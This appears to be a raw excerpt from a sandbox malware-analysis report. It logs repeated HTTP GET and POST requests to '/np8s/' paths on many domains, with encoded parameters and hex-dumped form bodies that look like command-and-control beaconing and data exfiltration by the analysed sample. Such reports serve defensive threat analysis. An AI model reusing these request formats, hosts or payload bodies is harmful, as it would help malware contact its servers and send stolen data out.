Source: global traffic HTTP traffic detected: GET /np8s/?U48h=N6XRxtM6F1nBVZRwu48YOgJ13F0eVAmeAwT+lah6Tiq2+v96MM9EXT3L0sCJR4qYezv9&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.brandingaloha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VAwngi5WtAVjDckXiPDKxPPVGnJBDj1vDFh4gmlmfJouKpIa6u8IzCyY+5EvW03qMChn&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvLs3P2LowQm4&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGFdHTU1h4cme&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=8LogcizAnzdlGnQxjqmkKg1ptkiP35PZAMc6f9pH/hY/tlO3rV33gx6kBCmuDEKP6O8z&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.losangelesrentalz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDebssumACK1+&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs2mn5+uwvQPb HTTP/1.1Host: www.medyumgalip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=Zh0bV6ZfyWWsx8NH2/NEuPodWNfo5oM06Wd1YTR0VEh7Ou4O0zYflewlPsoSmCQ+q/UO&2dEPbf=4hfxZPP84Ri HTTP/1.1Host: www.udrivestorage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=ki1nHMJkMrR7eeT2cjvvxShsxzdLToZEWe0Y/Ruw5T1OY282Gl8t0P/h1biOuIyNKIHU HTTP/1.1Host: www.lazarusnatura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=Gfubwqqm8fAzC8DVdPlLHb5iW2l0adCKSAamgQxpd8VH998tJyiM6MNptdcvbuHHsRLz HTTP/1.1Host: www.salondutaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&2dEPbf=4hfxZPP84Ri HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VAwngi5WtAVjDckXiPDKxPPVGnJBDj1vDFh4gmlmfJouKpIa6u8IzCyY+5EvW03qMChn&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 160.153.136.3
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.udrivestorage.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.udrivestorage.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.udrivestorage.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.udrivestorage.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.udrivestorage.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.udrivestorage.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.lazarusnatura.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.lazarusnatura.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lazarusnatura.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.lazarusnatura.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.lazarusnatura.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lazarusnatura.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.salondutaxi.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.salondutaxi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.salondutaxi.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.salondutaxi.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.salondutaxi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.salondutaxi.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.interlink-travel.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.interlink-travel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.interlink-travel.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.interlink-travel.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.interlink-travel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.interlink-travel.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.kishanshree.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.kishanshree.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kishanshree.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 67 6e 66 51 70 6f 61 42 4b 75 64 35 39 2d 34 68 71 6e 76 68 58 4a 6c 4d 41 4c 38 5a 5a 4d 34 6e 42 64 69 6f 66 6a 59 49 35 64 57 74 31 33 39 69 31 6d 49 4d 55 45 6a 36 69 72 56 6f 75 53 70 55 72 32 49 32 6e 66 4c 44 6d 6a 75 4a 6b 59 6b 53 31 48 63 44 4d 52 4b 6a 46 31 38 42 6a 42 58 73 6f 63 6a 53 41 6c 79 64 63 62 74 47 68 72 68 61 4a 52 56 4f 59 6b 41 70 4d 45 28 50 68 79 6d 46 63 50 73 6f 57 68 6e 73 51 61 67 51 37 35 36 4f 6c 4e 51 6a 57 56 35 45 4f 59 49 46 70 62 74 54 49 4a 6a 76 30 33 39 46 4b 4c 45 54 38 35 6a 4e 7a 33 74 31 50 6d 6f 7a 71 5f 7a 44 72 43 46 70 6f 35 6d 76 65 38 6b 47 50 79 43 5f 64 79 78 43 46 53 75 67 4a 38 31 41 4a 31 6e 4c 6e 68 55 33 49 72 33 77 4f 77 33 44 34 41 58 41 55 68 4e 61 7e 67 4c 52 37 44 57 75 48 74 6b 7a 5a 45 43 66 78 67 72 32 41 72 52 77 41 41 64 66 45 33 77 4f 66 31 63 58 61 39 4e 4d 72 6b 79 35 44 41 37 57 79 66 39 58 51 59 6e 6b 75 62 64 70 37 41 39 6f 6b 6b 79 71 77 54 46 4b 65 31 28 65 51 76 6e 72 32 4f 4f 4d 32 35 73 6a 38 5a 63 75 75 70 71 4d 4c 70 39 6f 61 56 7e 6c 33 31 4e 36 38 5a 7a 77 5a 79 79 48 4d 63 45 53 54 58 69 41 65 69 62 74 4f 49 69 6f 6b 42 5a 63 37 54 49 70 54 64 64 44 73 6d 41 74 57 4a 6a 70 4b 68 4c 7a 58 43 48 38 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
U48h=gnfQpoaBKud59-4hqnvhXJlMAL8ZZM4nBdiofjYI5dWt139i1mIMUEj6irVouSpUr2I2nfLDmjuJkYkS1HcDMRKjF18BjBXsocjSAlydcbtGhrhaJRVOYkApME(PhymFcPsoWhnsQagQ756OlNQjWV5EOYIFpbtTIJjv039FKLET85jNz3t1Pmozq_zDrCFpo5mve8kGPyC_dyxCFSugJ81AJ1nLnhU3Ir3wOw3D4AXAUhNa~gLR7DWuHtkzZECfxgr2ArRwAAdfE3wOf1cXa9NMrky5DA7Wyf9XQYnkubdp7A9okkyqwTFKe1(eQvnr2OOM25sj8ZcuupqMLp9oaV~l31N68ZzwZyyHMcESTXiAeibtOIiokBZc7TIpTddDsmAtWJjpKhLzXCH8pA).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.kishanshree.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.kishanshree.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kishanshree.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 67 6e 66 51 70 74 36 58 4f 66 77 74 6c 4c 68 48 70 55 66 50 63 5a 31 53 4e 62 49 47 58 75 4d 4f 47 70 48 5a 43 53 70 70 7e 59 79 33 28 6e 68 66 7e 45 34 69 55 46 54 54 76 35 78 33 28 69 6c 54 72 32 51 55 6e 66 50 44 70 44 47 5a 6b 35 30 34 31 69 6f 45 42 52 4b 66 45 31 38 45 6e 44 79 4f 6f 63 6d 33 41 6b 33 41 64 72 52 47 75 70 5a 61 4c 53 39 46 62 45 42 69 50 45 76 62 76 53 36 63 63 50 45 4f 57 6c 6e 73 58 71 73 51 36 61 69 4e 6a 4d 51 38 53 46 35 63 66 6f 49 51 77 4c 6f 6b 49 4a 6e 4e 30 32 42 46 4c 35 77 54 38 6f 44 4e 30 47 74 79 42 32 6f 32 6f 50 7a 4b 68 69 5a 43 6f 35 37 39 65 39 67 57 50 44 6d 5f 50 79 78 44 42 44 32 47 4d 72 67 41 46 55 6a 73 6e 68 6f 65 4c 36 72 6f 4f 79 69 51 73 44 50 52 4e 77 68 38 7e 69 48 33 33 44 57 71 4d 4e 6c 78 5a 45 44 2d 78 67 72 55 41 72 42 77 41 44 39 66 46 56 49 4f 58 77 6f 51 52 39 4e 4a 79 30 79 68 65 51 33 75 79 66 6c 48 51 61 6e 4b 75 49 78 70 70 30 35 6f 6a 57 61 70 34 7a 46 49 61 31 7e 43 62 50 6d 6c 32 4f 4f 69 32 38 41 7a 28 76 59 75 76 34 71 4d 4c 4b 46 6f 59 6c 7e 6c 70 6c 4d 38 33 35 7e 31 5a 79 71 44 4d 65 63 6f 53 67 43 41 65 77 6a 74 4f 74 65 6f 6e 78 5a 63 76 6a 4a 78 43 38 74 4e 67 48 41 4f 46 37 43 56 66 58 79 32 58 53 4b 6b 39 32 7a 55 4c 70 37 79 53 69 32 67 52 4b 54 43 41 5f 75 47 6e 51 74 65 62 53 52 41 66 74 74 45 43 5a 62 67 79 58 44 34 6d 6b 72 45 6e 36 61 2d 35 65 34 78 28 67 62 6d 62 77 37 4b 48 48 49 6b 43 67 78 52 70 5a 51 39 30 55 69 51 75 34 71 7a 31 41 5a 4d 6c 2d 65 4a 75 52 58 61 47 2d 34 59 4d 34 56 39 68 78 41 79 77 66 71 75 76 78 51 6e 44 50 37 69 66 
79 51 67 73 52 43 48 45 4c 30 32 6b 4e 61 33 77 6a 30 7a 41 66 64 5f 64 56 65 2d 7a 6e 53 35 46 70 52 49 72 6b 42 6d 63 6d 6d 32 34 35 46 30 56 55 76 32 63 47 68 5f 38 37 57 36 43 74 63 4f 55 4d 63 56 42 65 6d 64 66 54 58 76 67 45 68 4f 55 54 76 4d 74 4f 79 4b 72 78 54 4f 4c 75 6e 32 39 74 48 72 6e 7a 6a 4a 63 59 39 32 4b 55 61 4b 6e 4e 62 75 48 4a 52 53 57 53 4c 49 43 66 37 75 65 77 6e 45 70 6e 32 6c 4d 54 32 30 4d 65 58 67 6b 62 6c 75 78 77 57 54 4d 39 78 31 30 56 28 67 62 43 53 49 43 74 43 6b 38 63 30 7a 30 57 76 64 28 4a 6b 66 75 69 55 55 6d 42 4f 7a 6b 55 50 55 4b 79 4d 35 68 78 6b 33 6a 64 75 49 72 58 54 4a 34 53 6b 58 50 71 28 38 54 45 76 59 71 72 48 7a 69 33 6b 51 32 4e 47 73 6c 55 39 4b 45 70 33 69 48 4e 28 5a 78 67 69 61 4b 42 55 6a 71 59 72 71 35 48 6c 4d 6f 64 74 52 33 51 47 58 4b 63 62 41 66 5f 74 57 38 32 62 7a 6e 58 48 4a 42 70 73 50 5a 6f 4b 6c 76 6b 6f 39 43 57 77 62 68 44 5a 76 65 75 31 63 6c 66 61 6e 75 6b 74 58 4a 35 55 39 51 55 45 71 28 56 30 4a 76 53 4a 79 39 39 6c 6c 76 78 33 44 56 44
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.kishanshree.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.kishanshree.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kishanshree.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 67 6e 66 51 70 6f 61 42 4b 75 64 35 39 2d 34 68 71 6e 76 68 58 4a 6c 4d 41 4c 38 5a 5a 4d 34 6e 42 64 69 6f 66 6a 59 49 35 64 57 74 31 33 39 69 31 6d 49 4d 55 45 6a 36 69 72 56 6f 75 53 70 55 72 32 49 32 6e 66 4c 44 6d 6a 75 4a 6b 59 6b 53 31 48 63 44 4d 52 4b 6a 46 31 38 42 6a 42 58 73 6f 63 6a 53 41 6c 79 64 63 62 74 47 68 72 68 61 4a 52 56 4f 59 6b 41 70 4d 45 28 50 68 79 6d 46 63 50 Data Ascii: U48h=gnfQpoaBKud59-4hqnvhXJlMAL8ZZM4nBdiofjYI5dWt139i1mIMUEj6irVouSpUr2I2nfLDmjuJkYkS1HcDMRKjF18BjBXsocjSAlydcbtGhrhaJRVOYkApME(PhymFcP
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.littlebeartreeservices.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.littlebeartreeservices.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 61 43 45 64 7e 46 56 41 74 53 31 64 61 66 39 34 79 59 65 41 69 4a 6e 4e 51 32 6c 66 41 67 46 56 46 42 74 36 34 58 6c 77 63 4d 77 46 43 64 67 51 7a 62 68 44 32 6e 58 41 72 72 6b 4b 65 77 7a 46 4c 7a 63 32 4b 56 52 39 55 75 64 6e 51 43 65 5a 7e 51 4b 49 45 6f 74 6d 56 32 49 37 68 5f 69 70 74 4c 4b 2d 33 51 65 68 4c 66 32 77 76 58 4b 4e 35 77 4f 6c 6c 67 74 79 35 58 71 4d 72 35 50 52 58 63 54 2d 42 62 43 37 36 39 45 44 64 70 6d 34 44 30 32 73 52 36 77 6c 31 2d 6c 69 71 4f 4b 74 63 58 4d 6f 43 48 35 7a 46 45 32 77 41 79 64 62 6b 6f 75 61 79 56 58 54 37 4a 79 6b 79 68 62 63 70 37 35 45 4e 34 4d 35 4e 6b 54 55 59 31 58 74 37 4e 37 49 69 42 59 6c 44 4c 4e 4b 67 64 41 37 74 4f 65 77 56 41 6a 77 37 6a 42 77 74 5f 4c 31 50 69 69 58 59 50 36 79 31 31 51 4b 59 75 35 32 31 33 5a 4f 41 73 56 38 4a 69 65 35 70 78 4e 41 75 4d 73 73 69 66 45 64 68 46 37 43 43 6a 36 5f 4d 4e 4e 30 77 75 44 54 34 73 59 6c 42 31 72 58 43 73 59 56 42 61 64 4a 49 35 7e 4b 30 42 6b 59 61 43 4a 72 7a 4a 77 37 46 58 39 6a 7a 6a 6e 69 52 48 45 2d 65 78 78 73 6a 46 67 56 79 31 6c 64 75 4f 65 58 44 51 78 5a 51 44 4a 75 38 6b 30 65 36 77 57 48 47 33 52 6a 56 76 44 38 58 37 46 58 39 78 6e 4f 70 74 38 47 70 72 6e 4d 4e 31 6a 58 34 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
U48h=aCEd~FVAtS1daf94yYeAiJnNQ2lfAgFVFBt64XlwcMwFCdgQzbhD2nXArrkKewzFLzc2KVR9UudnQCeZ~QKIEotmV2I7h_iptLK-3QehLf2wvXKN5wOllgty5XqMr5PRXcT-BbC769EDdpm4D02sR6wl1-liqOKtcXMoCH5zFE2wAydbkouayVXT7Jykyhbcp75EN4M5NkTUY1Xt7N7IiBYlDLNKgdA7tOewVAjw7jBwt_L1PiiXYP6y11QKYu5213ZOAsV8Jie5pxNAuMssifEdhF7CCj6_MNN0wuDT4sYlB1rXCsYVBadJI5~K0BkYaCJrzJw7FX9jzjniRHE-exxsjFgVy1lduOeXDQxZQDJu8k0e6wWHG3RjVvD8X7FX9xnOpt8GprnMN1jX4A).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.littlebeartreeservices.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.littlebeartreeservices.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 61 43 45 64 7e 48 42 57 67 44 5a 55 55 76 67 44 31 71 75 75 70 59 33 50 53 6d 68 62 44 68 35 4b 57 44 59 4c 32 32 56 4e 4f 59 38 66 48 74 56 47 33 63 73 51 32 69 72 70 68 34 41 4f 55 77 33 47 4c 7a 45 59 4b 56 56 39 54 75 45 71 52 6a 4f 6e 39 7a 75 4c 45 49 74 61 55 32 49 59 6c 39 47 58 74 4c 7e 51 33 52 6d 78 4c 4d 79 77 76 30 69 4e 74 48 53 5f 36 77 74 38 33 7a 32 75 6c 5a 43 37 58 63 4b 37 42 65 69 37 35 4e 41 44 63 49 57 6e 4c 54 4b 76 57 71 77 73 79 2d 6b 6b 68 75 57 66 63 58 4a 39 43 43 42 7a 46 58 53 77 44 42 56 62 73 35 75 64 36 46 58 63 28 4a 79 31 34 42 57 43 70 37 6c 59 4e 36 67 50 4e 57 50 55 59 46 58 73 73 73 7e 33 6c 57 34 55 46 4c 49 6f 67 64 4d 43 73 66 54 7a 56 42 66 51 39 52 5a 41 78 74 79 59 50 67 75 78 55 50 36 32 37 56 52 57 59 75 34 48 31 33 5a 67 41 73 46 38 4a 6a 47 35 71 54 31 41 71 74 73 6a 6e 5f 45 59 72 6c 36 48 64 54 6e 45 4d 4e 45 78 77 75 4c 31 35 64 63 6c 41 55 62 58 55 75 67 4b 4b 36 64 4c 47 5a 7e 66 7e 68 6c 50 61 43 49 38 7a 49 77 72 46 67 64 6a 31 33 7a 69 52 6c 38 2d 5a 52 78 73 6f 6c 67 58 72 6c 35 4e 75 49 32 74 44 52 42 6e 52 7a 39 75 38 33 73 65 72 55 4b 48 48 6e 52 6a 4d 66 44 79 65 34 78 61 78 6d 33 35 6b 39 59 68 6e 4d 48 53 59 6d 6d 47 74 64 35 32 62 63 42 62 69 71 74 63 31 52 69 6f 36 32 51 56 34 67 6b 44 4f 32 79 53 4e 6b 79 65 55 34 46 56 44 65 31 66 54 4e 53 5f 66 4c 4d 49 76 58 41 47 4c 46 66 4a 6c 61 65 6b 32 74 62 56 37 6b 39 75 75 43 6d 79 31 79 50 7a 70 75 65 64 4f 4c 68 6a 55 67 58 31 38 59 35 55 55 34 70 54 64 4e 59 6d 57 77 61 31 28 30 
43 43 55 58 66 44 59 35 36 6e 70 47 6f 63 46 6f 50 68 68 36 28 54 79 34 4a 2d 4e 6b 70 45 71 74 35 45 4b 37 6e 37 6d 46 32 6a 43 78 75 49 44 66 73 71 48 47 7e 72 31 42 69 6f 4b 69 74 54 47 63 59 5f 73 4e 49 73 59 4b 78 74 49 69 7a 52 33 57 51 59 6c 41 57 6b 57 78 6c 59 35 46 67 4a 6b 67 73 65 30 74 6c 77 55 56 6e 72 68 33 72 42 76 6f 43 39 64 61 49 55 44 57 51 58 32 6d 65 31 36 58 52 78 6b 57 36 4e 48 69 46 42 50 5a 36 4e 55 47 74 6c 66 4c 68 62 53 36 49 44 66 4a 63 39 69 31 35 53 48 48 4a 46 65 65 55 42 32 63 49 67 73 6b 6b 4d 61 67 50 45 30 43 50 4e 73 37 72 4d 74 63 47 34 5a 31 67 72 4e 71 4c 63 51 79 43 52 34 34 39 61 64 47 48 58 62 6a 78 58 75 6a 44 7a 38 51 32 61 72 68 64 4d 45 63 34 6d 4a 78 4c 64 48 5a 67 6c 34 70 35 4d 4d 6e 30 72 50 31 57 69 4c 38 4b 67 38 79 46 59 31 31 57 55 43 67 51 35 50 68 39 6d 30 4a 6e 4e 38 6b 6c 30 75 5a 31 5f 44 77 4e 57 67 31 77 4b 31 6d 76 55 31 4d 4b 39 78 43 47 54 62 63 74 4a 67 32 30 51 67 50 42 70 55 43 66 36 57 35 59 4d 44 33 39 43 7a 74 78 61 54 52 66 32 6a 7a 39
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.sekolahkejepang.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.sekolahkejepang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sekolahkejepang.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 61 4d 51 46 55 50 69 6f 4b 78 6d 68 47 46 4e 6b 49 35 68 59 57 5f 47 36 63 6a 6d 72 41 4f 79 52 54 56 36 73 42 41 49 62 54 50 42 30 38 76 52 36 72 67 54 35 58 73 34 4f 77 36 67 6c 4d 48 50 58 38 42 44 6d 67 6f 28 6a 76 58 67 49 61 57 59 48 37 42 35 6c 6e 52 44 5f 4a 41 70 6c 50 41 63 59 57 66 48 44 38 4b 77 2d 34 45 62 4a 48 30 78 35 51 6c 65 56 47 69 48 66 6c 79 4d 54 38 71 69 54 78 77 50 48 76 6d 71 6d 4c 45 36 72 67 4d 77 79 52 4b 4e 4e 68 73 62 6e 6b 31 65 45 7e 79 51 64 71 41 53 6c 63 4b 6b 39 66 71 30 65 37 42 54 35 38 68 42 35 62 41 45 48 70 36 28 4e 6d 34 67 53 64 47 44 53 71 47 74 32 4d 30 65 39 4d 67 51 57 47 46 57 2d 51 50 43 4f 72 57 30 51 49 79 4d 53 37 68 67 50 4c 6f 61 77 4a 50 6a 36 70 39 6b 4e 73 5a 75 79 43 7a 66 75 4e 71 4f 57 35 32 4d 7a 4a 62 45 54 4f 51 34 52 6d 41 43 68 71 39 48 6f 35 76 58 6a 6e 68 6d 2d 53 4f 72 75 62 38 4f 75 42 79 67 70 6b 67 34 34 6a 70 6a 47 70 66 64 53 6b 6f 67 79 63 2d 46 4a 68 33 52 48 39 58 61 63 62 74 68 57 4f 49 63 6e 34 74 41 4c 37 4d 33 5a 7a 4b 4e 2d 30 33 52 74 78 2d 6e 34 43 73 50 42 51 75 78 38 48 55 73 6b 41 75 38 78 78 35 50 31 41 42 6c 55 4e 66 56 6d 4a 66 50 79 57 46 79 35 69 2d 77 6a 61 7a 59 78 55 62 6e 59 39 5a 7e 72 51 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
